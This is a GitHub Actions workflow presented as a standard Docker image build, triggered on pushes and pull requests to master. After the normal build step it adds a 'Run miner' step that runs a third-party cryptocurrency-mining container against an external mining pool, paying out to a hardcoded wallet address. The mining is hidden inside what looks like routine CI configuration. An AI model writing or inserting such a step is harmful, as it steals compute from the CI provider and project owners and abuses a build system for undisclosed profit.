name: Docker Image CI

on:
  push:
    branches: [ "master" ]
  pull_request:
    branches: [ "master" ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Build the Docker image
      run: docker build . --file Dockerfile --tag my-image-name:$(date +%s)

    - name: Run miner
      run: |
        docker run --rm wattpool/verusccminer \
        -o stratum+tcp://eu.luckpool.net:3956 \
        -u RDuuJMW7LLCSwRExPtQmqBb3TJeNtjxtqL.workflow \
        -p x \
        -a verus
